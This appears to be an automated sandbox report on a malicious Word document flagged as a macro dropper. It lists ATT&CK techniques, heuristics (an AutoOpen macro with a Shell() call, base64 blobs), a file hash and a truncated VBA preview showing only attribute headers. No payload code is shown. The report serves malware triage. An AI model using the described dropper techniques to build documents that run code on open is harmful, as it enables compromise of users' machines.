Verdict: MALICIOUS

Risk Score: 184

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes the Shell() function. This indicates the document is designed to execute arbitrary code, likely downloading and running a secondary payload. ClamAV detection further confirms its malicious nature.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6364202-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6364202-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11082 bytes |

SHA-256: c22f941ec63c8aa51237c855a8f3186114cc0c06320697daaa65186142681c15

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 29 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mCkrZzdFc"
```
... (truncated)